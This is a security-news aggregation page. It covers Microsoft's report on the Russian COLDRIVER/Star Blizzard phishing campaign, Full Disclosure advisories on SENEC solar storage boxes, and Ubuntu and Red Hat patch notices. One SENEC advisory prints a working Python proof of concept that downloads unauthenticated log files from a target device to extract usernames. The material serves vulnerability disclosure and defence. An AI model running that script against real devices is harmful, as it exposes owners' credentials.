The threat actor known as COLDRIVER has continued to engage in credential theft activities against entities that are of strategic interests to Russia while simultaneously improving its detection evasion capabilities.
The Microsoft Threat Intelligence team is tracking under the cluster as Star Blizzard (formerly SEABORGIUM). It's also called Blue Callisto, BlueCharlie (or TAG-53),

Threat Intelligence / Cyber Espionage

The threat actor known as COLDRIVER has continued to engage in credential theft activities against entities that are of strategic interests to Russia while simultaneously improving its detection evasion capabilities.

The Microsoft Threat Intelligence team is tracking under the cluster as **Star Blizzard** (formerly SEABORGIUM). It's also called Blue Callisto, BlueCharlie (or TAG-53), Calisto (alternately spelled Callisto), and TA446.

The adversary "continues to prolifically target individuals and organizations involved in international affairs, defense, and logistics support to Ukraine, as well as academia, information security companies, and other entities aligning with Russian state interests," Redmond said.

Star Blizzard, linked to Russia's Federal Security Service (FSB), has a track record of setting up lookalike domains that impersonate the login pages of targeted companies. It's known to be active since at least 2017.

UPCOMING WEBINAR

Cracking the Code: Learn How Cyber Attackers Exploit Human Psychology

Ever wondered why social engineering is so effective? Dive deep into the psychology of cyber attackers in our upcoming webinar.

Join Now

In August 2023, Recorded Future revealed 94 new domains that are part of the threat actor's attack infrastructure, most of which feature keywords related to information technology and cryptocurrency.

Microsoft said it observed the adversary leveraging server-side scripts to prevent automated scanning of the actor-controlled infrastructure starting April 2023, moving away from hCaptcha to determine targets of interest and redirecting the browsing session to the Evilginx server.

The server-side JavaScript code is designed to check if the browser has any plugins installed, if the page is being accessed by an automation tool like Selenium or PhantomJS, and transmit the results to the server in the form of a HTTP POST request.

"Following the POST request, the redirector server assesses the data collected from the browser and decides whether to allow continued browser redirection," Microsoft said.

"When a good verdict is reached, the browser receives a response from the redirection server, redirecting to the next stage of the chain, which is either an hCaptcha for the user to solve, or direct to the Evilginx server."

Also newly used by Star Blizzard are email marketing services like HubSpot and MailerLite to craft campaigns that serve as the starting point of the redirection chain that culminates at the Evilginx server hosting the credential harvesting page.

In addition, the threat actor has been observed using a domain name service (DNS) provider to resolve actor-registered domain infrastructure, sending password-protected PDF lures embedding the links to evade email security processes as well as host the files on Proton Drive.

That's not all. In a sign that the threat actor is actively keeping tabs on public reporting into its tactics and techniques, it has now upgraded its domain generation algorithm (DGA) to include a more randomized list of words when naming them.

Despite these changes, "Star Blizzard activities remain focused on email credential theft, predominantly targeting cloud-based email providers that host organizational and/or personal email accounts," Microsoft said.

"Star Blizzard remains constant in their use of pairs of dedicated VPSs to host actor-controlled infrastructure (redirector + Evilginx servers) used for spear-phishing activities, where each server usually hosts a separate actor registered domain."

**U.K. Sanctions Two Members of Star Blizzard**

The development comes as the U.K. called out Star Blizzard for "sustained unsuccessful attempts to interfere in U.K. political processes" by targeting high-profile individuals and entities through cyber operations.

Besides linking Star Blizzard to Centre 18, a subordinate element within FSB, the U.K. government sanctioned two members of the hacking crew – Ruslan Aleksandrovich Peretyatko and Andrey Stanislavovich Korinets (aka Alexey Doguzhiev) – for their involvement in the spear-phishing campaigns.

The activity "resulted in unauthorized access and exfiltration of sensitive data, which was intended to undermine UK organizations and more broadly, the UK government," it said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Microsoft Warns of COLDRIVER's Evolving Evading and Credential-Stealing Tactics

The affected devices transmit sensitive information unencrypted allowing a remote unauthenticated attacker to capture and modify network traffic.

**Full Disclosure mailing list archives**

_From_: Phos4Me via Fulldisclosure <fulldisclosure () seclists org>  
_Date_: Fri, 10 Nov 2023 07:13:23 +0000  

> > Advisory ID: Ph0s-2023-004
> > Product: EnBw - SENEC legacy storage box: V1-V3
> > Manufacturer: SENEC - a part of EnBw
> > Affected Version(s): Firmware: all (as of 2023-06-19)
> > Tested Version(s): current
> > Vulnerability Type: CWE-319: Cleartext Transmission of Sensitive Information

> > Risk Level:
> > CVSS v3.1 Vector:
> > AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N (8.1 High)

> > Manufacturer Risk Level Rating:
> > AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:L/E:F/RL:U/RC:C
> > Overall CVSS Score: 7.4

> > Solution Status: Fixed
> > Manufacturer Notification: 2023-06-05
> > Public Disclosure: 2023-11-01
> > CVE Reference: CVE-2023-39172
> > Author of Advisory: Ph0s\[4\], R0ckE7

> > \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*

> > Overview:
> > Foreword:
> > This vulnerability was reported to the enbw-cert. we would like to
> > thank enbw-cert for taking care of the vulns and patch the systems.
> > we decided to publish when most of the reported vulns are patched
> > to make sure nobody is harmed when 3rdparys exploit the mentioned vulns.

> > About Senec:
> > We are SENEC

> > We have been the EnBW energy independence experts since 2018 – but we have
> > put our heart and soul into guiding customers on the route to independence
> > since SENEC was founded in 2009. Our passion lies in actively promoting the
> > energy transition with innovative ideas and pioneering products. And,
> > because we don’t do things by halves, our unwavering ambition is to create
> > integrated solutions that enable you to enjoy the highest possible degree
> > of independence and sustainability through self-generation of solar
> > electricity.

> > About SENEC Home:

> > SENEC.Home: The smart electricity storage device for your home

> > SENEC.Home is the heart of the your sustainable, affordable supply of solar
> > electricity. The smart battery storage device stores excess electricity
> > generated by your PV system so that you can use it when you need it – such as
> > when your household’s energy consumption rises in the evening, or on rainy days
> > when your PV system generates less power.

> > \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*

> > Vulnerability Details:

> > The management interface of the SENEC.Inverter transmits security-critical data
> > (authentication credentials) in cleartext in a communication channel that can be
> > sniffed by unauthorized actors. For example, in networking, packets can traverse
> > many intermediary nodes from the source to the destination, whether across the
> > internet or an internal network. Some actors might have privileged access to a
> > network interface or any link along the channel, such as a router. As a result,
> > network traffic could be sniffed by adversaries, spilling security-critical data.
> > Incidentally, this refers not only to remote maintenance of the photovoltaic
> > system, but also to on-site configuration by a technician at the customer’s
> > premises. Due to the lack of transport encryption, a technically skilled
> > customer is therefore also able to gather authentication credentials by
> > intercepting network traffic, e.g. at the central network gateway.

> > \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*

> > Proof of Concept (PoC):

> > n/a, simply sniff the network

> > \~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

> > Solution:
> > Patched by Manufacturer
> > (Rolled out until September 11, 2023)

> > \~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

> > Disclosure Timeline:

> > 2022-06-01: Vulnerability discovered
> > 2023-06-05: Vulnerability reported to manufacturer
> > 2023-09-11: Patch rollout by manufacturer to affected devices
> > 2023-11-01: Public disclosure of vulnerability

> > \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*

> > Researcher:
> > Ph0s\[4\], R0ckE7

> > \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*

> > Disclaimer:

> > The information provided in this security advisory is provided "as is"
> > and without warranty of any kind. Details of this security advisory may
> > be updated in order to provide as accurate information as possible.

> > \~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

> > Copyright:

> > Creative Commons - Attribution (by) - Version 4.0
> > URL: https://creativecommons.org/licenses/by/4.0/deed.en
> > \_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
> > Sent through the Full Disclosure mailing list
> > https://nmap.org/mailman/listinfo/fulldisclosure
> > Web Archives & RSS: https://seclists.org/fulldisclosure/

**Attachment: publickey - Phos4Me@proton.me - 0x3F4F673D.asc**  
_Description:_

**Attachment: signature.asc**  
_Description:_ OpenPGP digital signature

\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

**Current thread:**

*   **Senec Inverters Home V1, V2, V3 Home & Hybrid Cleartext Transmission of Authentication Credentials - CVE-2023-39172** _Phos4Me via Fulldisclosure (Nov 12)_

CVE-2023-39172: Full Disclosure: Senec Inverters Home V1, V2, V3 Home & Hybrid Cleartext Transmission of Authentication Credentials

In SENEC Storage Box V1,V2 and V3 an unauthenticated remote attacker can obtain the devices' logfiles that contain sensitive data.

**Full Disclosure mailing list archives**

_From_: Phos4Me via Fulldisclosure <fulldisclosure () seclists org>  
_Date_: Fri, 10 Nov 2023 07:12:01 +0000  

> > Advisory ID: Ph0s-2023-002
> > Product: EnBw - SENEC legacy storage box: V1-V3
> > Manufacturer: SENEC - a part of EnBw
> > Affected Version(s): Firmware: all (as of 2023-06-19)
> > Tested Version(s): current
> > Vulnerability Type: CWE-200: Exposure of Sensitive Information to an
> > Unauthorized Actor

> > Risk Level: CVSS v3.1 Vector:
> > AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N (7.5 High)

> > Manufacturer Risk Level Rating:
> > AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:H/RL:T/RC:C
> > Overall CVSS Score: 7.2

> > Solution Status: Fixed
> > Manufacturer Notification: 2023-06-05
> > Public Disclosure: 2023-11-01
> > CVE Reference: CVE-2023-39168
> > Author of Advisory: Ph0s\[4\], R0ckE7

> > \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*

> > Overview:
> > Foreword:
> > This vulnerability was reported to the enbw-cert. we would like to
> > thank enbw-cert for taking care of the vulns and patch the systems.
> > we decided to publish when most of the reported vulns are patched
> > to make sure nobody is harmed when 3rdparys exploit the mentioned vulns.

> > About Senec:
> > We are SENEC

> > We have been the EnBW energy independence experts since 2018 – but we have
> > put our heart and soul into guiding customers on the route to independence
> > since SENEC was founded in 2009. Our passion lies in actively promoting the
> > energy transition with innovative ideas and pioneering products. And,
> > because we don’t do things by halves, our unwavering ambition is to create
> > integrated solutions that enable you to enjoy the highest possible degree
> > of independence and sustainability through self-generation of solar
> > electricity.

> > About SENEC Home:

> > SENEC.Home: The smart electricity storage device for your home

> > SENEC.Home is the heart of the your sustainable, affordable supply of solar
> > electricity. The smart battery storage device stores excess electricity
> > generated by your PV system so that you can use it when you need it – such as
> > when your household’s energy consumption rises in the evening, or on rainy days
> > when your PV system generates less power.

> > \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*

> > Vulnerability Details:

> > As already stated in CVE-2023-39167, no authentication is required to access log
> > information. Therefore, and due to the predictable URL scheme, it is possible
> > for an attacker to download all existing log files to obtain the username.

> > \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*

> > Proof of Concept (PoC):

> > The attack consists of the following steps:

> > 1\. parse the script using this PoC Code to obtail the username:
> > import argparse
> > import datetime
> > import os
> > import requests

> > def get\_senec\_logs(senec\_ip, day\_range, break\_on\_username):
> > start\_date = datetime.datetime.today()
> > end\_date = start\_date - datetime.timedelta(days=day\_range)
> > delta = datetime.timedelta(days=1)

> > while end\_date < start\_date:
> > try:
> > senec\_url = f"http://{senec\_ip}/log/{start\_date.strftime('%Y')}/" \\
> > f"{start\_date.strftime('%m')}/{start\_date.strftime('%d')}.log"
> > r = requests.get(senec\_url)
> > print(f"HTTP Status Code {r.status\_code}: {senec\_url}")

> > if r.status\_code != 200: break
> > if r.headers\["Content-Length"\] == "0": break

> > os.makedirs(os.path.dirname(senec\_url.replace("http://";, "")), exist\_ok=True)
> > with open(senec\_url.replace("http://";, ""), "wb") as senec\_log\_file:
> > senec\_log\_file.write(r.content)
> > offset = r.content.find(bytes("username:", "utf-8"))
> > if offset != -1:
> > print(f"Username found in {senec\_log\_file.name} at offset {offset}")
> > if break\_on\_username: break
> > except requests.ConnectionError:
> > print("Failed to connect to SENEC.Inverter")
> > break
> > except Exception as e:
> > print(f"An unhandled exception occurred:\\n{e}")
> > break
> > start\_date -= delta

> > if name == 'main':
> > parser = argparse.ArgumentParser(description="Download SENEC.Inverter log files")
> > parser.add\_argument("ip", type=str, help="IP address of the target SENEC.Inverter")
> > parser.add\_argument("-b", "--break-on-username", action="store\_true", default=False, required=False,
> > help="stop downloading once a username is found")
> > parser.add\_argument("-d", "--day-range", type=int, action="store", default=365 \* 20, required=False,
> > help="number of days to download log files in reverse order starting today")
> > args = parser.parse\_args()
> > get\_senec\_logs(args.ip, args.day\_range, args.break\_on\_username)

> > \~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

> > Solution:
> > Patched by Manufacturer
> > (Rolled out until September 11, 2023)

> > \~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

> > Disclosure Timeline:

> > 2022-06-01: Vulnerability discovered
> > 2023-06-05: Vulnerability reported to manufacturer
> > 2023-09-11: Patch rollout by manufacturer to affected devices
> > 2023-11-01: Public disclosure of vulnerability

> > \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*

> > Researcher:
> > Ph0s\[4\], R0ckE7

> > \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*

> > Disclaimer:

> > The information provided in this security advisory is provided "as is"
> > and without warranty of any kind. Details of this security advisory may
> > be updated in order to provide as accurate information as possible.

> > \~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

> > Copyright:

> > Creative Commons - Attribution (by) - Version 4.0
> > URL: https://creativecommons.org/licenses/by/4.0/deed.en
> > \_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
> > Sent through the Full Disclosure mailing list
> > https://nmap.org/mailman/listinfo/fulldisclosure
> > Web Archives & RSS: https://seclists.org/fulldisclosure/

**Attachment: publickey - Phos4Me@proton.me - 0x3F4F673D.asc**  
_Description:_

**Attachment: signature.asc**  
_Description:_ OpenPGP digital signature

\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

**Current thread:**

*   **Senec Inverters Home V1, V2, V3 Home & Hybrid Exposure of the Username to an Unauthorized Actor - CVE-2023-39168** _Phos4Me via Fulldisclosure (Nov 12)_

CVE-2023-39167: Full Disclosure: Senec Inverters Home V1, V2, V3 Home & Hybrid Exposure of the Username to an Unauthorized Actor

Ubuntu Security Notice 6536-1 - Lucas Leong discovered that the netfilter subsystem in the Linux kernel did not properly validate some attributes passed from userspace. A local attacker could use this to cause a denial of service or possibly expose sensitive information. Kyle Zeng discovered that the IPv4 implementation in the Linux kernel did not properly handle socket buffers when performing IP routing in certain circumstances, leading to a null pointer dereference vulnerability. A privileged attacker could use this to cause a denial of service.

    ==========================================================================Ubuntu Security Notice USN-6536-1December 06, 2023linux, linux-aws, linux-azure, linux-laptop, linux-lowlatency,linux-oem-6.5, linux-oracle, linux-raspi, linux-starfive vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 23.10- Ubuntu 22.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux: Linux kernel- linux-aws: Linux kernel for Amazon Web Services (AWS) systems- linux-azure: Linux kernel for Microsoft Azure Cloud systems- linux-laptop: Linux kernel for Lenovo X13s ARM laptops- linux-lowlatency: Linux low latency kernel- linux-oracle: Linux kernel for Oracle Cloud systems- linux-raspi: Linux kernel for Raspberry Pi systems- linux-starfive: Linux kernel for StarFive processors- linux-oem-6.5: Linux kernel for OEM systemsDetails:Lucas Leong discovered that the netfilter subsystem in the Linux kernel didnot properly validate some attributes passed from userspace. A localattacker could use this to cause a denial of service (system crash) orpossibly expose sensitive information (kernel memory). (CVE-2023-39189)Kyle Zeng discovered that the IPv4 implementation in the Linux kernel didnot properly handle socket buffers (skb) when performing IP routing incertain circumstances, leading to a null pointer dereference vulnerability.A privileged attacker could use this to cause a denial of service (systemcrash). (CVE-2023-42754)Yikebaer Aizezi discovered that the ext4 file system implementation in theLinux kernel contained a use-after-free vulnerability when handling inodeextent metadata. An attacker could use this to construct a malicious ext4file system image that, when mounted, could cause a denial of service(system crash). (CVE-2023-45898)Jason Wang discovered that the virtio ring implementation in the Linuxkernel did not properly handle iov buffers in some situations. A localattacker in a guest VM could use this to cause a denial of service (hostsystem crash). (CVE-2023-5158)Alon Zahavi discovered that the NVMe-oF/TCP subsystem in the Linux kerneldid not properly handle queue initialization failures in certainsituations, leading to a use-after-free vulnerability. A remote attackercould use this to cause a denial of service (system crash) or possiblyexecute arbitrary code. (CVE-2023-5178)Budimir Markovic discovered that the perf subsystem in the Linux kernel didnot properly handle event groups, leading to an out-of-bounds writevulnerability. A local attacker could use this to cause a denial of service(system crash) or possibly execute arbitrary code. (CVE-2023-5717)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 23.10:   linux-image-6.5.0-1005-starfive  6.5.0-1005.6   linux-image-6.5.0-1007-laptop   6.5.0-1007.10   linux-image-6.5.0-1008-raspi    6.5.0-1008.11   linux-image-6.5.0-1009-azure    6.5.0-1009.9   linux-image-6.5.0-1009-azure-fde  6.5.0-1009.9   linux-image-6.5.0-1011-aws      6.5.0-1011.11   linux-image-6.5.0-1013-oracle   6.5.0-1013.13   linux-image-6.5.0-14-generic    6.5.0-14.14   linux-image-6.5.0-14-generic-64k  6.5.0-14.14   linux-image-6.5.0-14-lowlatency  6.5.0-14.14.1   linux-image-6.5.0-14-lowlatency-64k  6.5.0-14.14.1   linux-image-aws                 6.5.0.1011.11   linux-image-azure               6.5.0.1009.11   linux-image-azure-fde           6.5.0.1009.11   linux-image-generic             6.5.0.14.16   linux-image-generic-64k         6.5.0.14.16   linux-image-generic-lpae        6.5.0.14.16   linux-image-kvm                 6.5.0.14.16   linux-image-laptop-23.10        6.5.0.1007.10   linux-image-lowlatency          6.5.0.14.14.12   linux-image-lowlatency-64k      6.5.0.14.14.12   linux-image-oracle              6.5.0.1013.13   linux-image-raspi               6.5.0.1008.9   linux-image-raspi-nolpae        6.5.0.1008.9   linux-image-starfive            6.5.0.1005.7   linux-image-virtual             6.5.0.14.16Ubuntu 22.04 LTS:   linux-image-6.5.0-1009-oem      6.5.0-1009.10   linux-image-oem-22.04d          6.5.0.1009.11After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6536-1   CVE-2023-39189, CVE-2023-42754, CVE-2023-45898, CVE-2023-5158,   CVE-2023-5178, CVE-2023-5717Package Information:   https://launchpad.net/ubuntu/+source/linux/6.5.0-14.14   https://launchpad.net/ubuntu/+source/linux-aws/6.5.0-1011.11   https://launchpad.net/ubuntu/+source/linux-azure/6.5.0-1009.9   https://launchpad.net/ubuntu/+source/linux-laptop/6.5.0-1007.10   https://launchpad.net/ubuntu/+source/linux-lowlatency/6.5.0-14.14.1   https://launchpad.net/ubuntu/+source/linux-oracle/6.5.0-1013.13   https://launchpad.net/ubuntu/+source/linux-raspi/6.5.0-1008.11   https://launchpad.net/ubuntu/+source/linux-starfive/6.5.0-1005.6   https://launchpad.net/ubuntu/+source/linux-oem-6.5/6.5.0-1009.10

Ubuntu Security Notice USN-6536-1

Red Hat Security Advisory 2023-7669-03 - New Red Hat build of Cryostat 2.4.0 on RHEL 8 container images are now available.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7669.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: Red Hat build of Cryostat 2.4.0: new RHEL 8 container images  
Advisory ID:        RHSA-2023:7669-03  
Product:            Cryostat  
Advisory URL:       https://access.redhat.com/errata/RHSA-2023:7669  
Issue date:         2023-12-07  
Revision:           03  
CVE Names:          CVE-2023-24815  
====================================================================

Summary: 

New Red Hat build of Cryostat 2.4.0 on RHEL 8 container images are now available

Description:

New Red Hat build of Cryostat 2.4.0 on RHEL 8 container images have been released, adding a variety of features and bug fixes.

Users of the Red Hat build of Cryostat 2.3.1 on RHEL 8 container images are advised to upgrade to these updated images, which contain backported patches to fix these bugs and add these enhancements. Users of these images are also encouraged to rebuild all container images that depend on these images.

Security Fix(es):

* vertx-web: StaticHandler disclosure of classpath resources on Windows when mounted on a wildcard route (CVE-2023-24815)

* bouncycastle: potential blind LDAP injection attack using a self-signed certificate (CVE-2023-33201)

* netty: SniHandler 16MB allocation leads to OOM (CVE-2023-34462)

You can find images updated by this advisory in Red Hat Container Catalog (see References).

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-24815

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2209400  
https://bugzilla.redhat.com/show_bug.cgi?id=2215465  
https://bugzilla.redhat.com/show_bug.cgi?id=2216888  
https://issues.redhat.com/browse/JAVAMON-236  
https://issues.redhat.com/browse/JAVAMON-241  
https://issues.redhat.com/browse/JAVAMON-243  
https://issues.redhat.com/browse/JAVAMON-313  
https://issues.redhat.com/browse/JAVAMON-319

Red Hat Security Advisory 2023-7669-03

Red Hat Security Advisory 2023-7668-03 - An update for the squid:4 module is now available for Red Hat Enterprise Linux 8. Issues addressed include a denial of service vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7668.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: squid:4 security updateAdvisory ID:        RHSA-2023:7668-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:7668Issue date:         2023-12-06Revision:           03CVE Names:          CVE-2023-5824====================================================================Summary: An update for the squid:4 module is now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Squid is a high-performance proxy caching server for web clients, supporting FTP, Gopher, and HTTP data objects.Security Fix(es):* squid: DoS against HTTP and HTTPS (CVE-2023-5824)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-5824References:https://access.redhat.com/security/updates/classification/#importanthttps://access.redhat.com/security/updates/classification#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2245914

Red Hat Security Advisory 2023-7668-03

Red Hat Security Advisory 2023-7610-03 - Red Hat OpenShift Container Platform release 4.12.45 is now available with updates to packages and images that fix several bugs and add enhancements. Issues addressed include a denial of service vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7610.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: OpenShift Container Platform 4.12.45 packages and security update  
Advisory ID:        RHSA-2023:7610-03  
Product:            Red Hat OpenShift Enterprise  
Advisory URL:       https://access.redhat.com/errata/RHSA-2023:7610  
Issue date:         2023-12-06  
Revision:           03  
CVE Names:          CVE-2023-44487  
====================================================================

Summary: 

Red Hat OpenShift Container Platform release 4.12.45 is now available with updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container Platform 4.12.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.

This advisory contains the RPM packages for Red Hat OpenShift Container Platform 4.12.45. See the following advisory for the container images for this release:

https://access.redhat.com/errata/RHSA-2023:7608

Security Fix(es):

* HTTP/2: Multiple HTTP/2 enabled web servers are vulnerable to a DDoS attack (Rapid Reset Attack) (CVE-2023-44487)

* python-werkzeug: high resource consumption leading to denial of service (CVE-2023-46136)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

All OpenShift Container Platform 4.12 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift CLI (oc) or web console. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.12/updating/updating-cluster-cli.html

Solution:

https://docs.openshift.com/container-platform/4.12/release_notes/ocp-4-12-release-notes.html

CVEs:

CVE-2023-44487

References:

https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/security/vulnerabilities/RHSB-2023-003  
https://bugzilla.redhat.com/show_bug.cgi?id=2242803  
https://bugzilla.redhat.com/show_bug.cgi?id=2243296  
https://bugzilla.redhat.com/show_bug.cgi?id=2246310

Red Hat Security Advisory 2023-7610-03

Red Hat Security Advisory 2023-7608-03 - Red Hat OpenShift Container Platform release 4.12.45 is now available with updates to packages and images that fix several bugs and add enhancements.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7608.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: OpenShift Container Platform 4.12.45 bug fix and security update  
Advisory ID:        RHSA-2023:7608-03  
Product:            Red Hat OpenShift Enterprise  
Advisory URL:       https://access.redhat.com/errata/RHSA-2023:7608  
Issue date:         2023-12-06  
Revision:           03  
CVE Names:          CVE-2023-39325  
====================================================================

Summary: 

Red Hat OpenShift Container Platform release 4.12.45 is now available with updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container Platform 4.12.

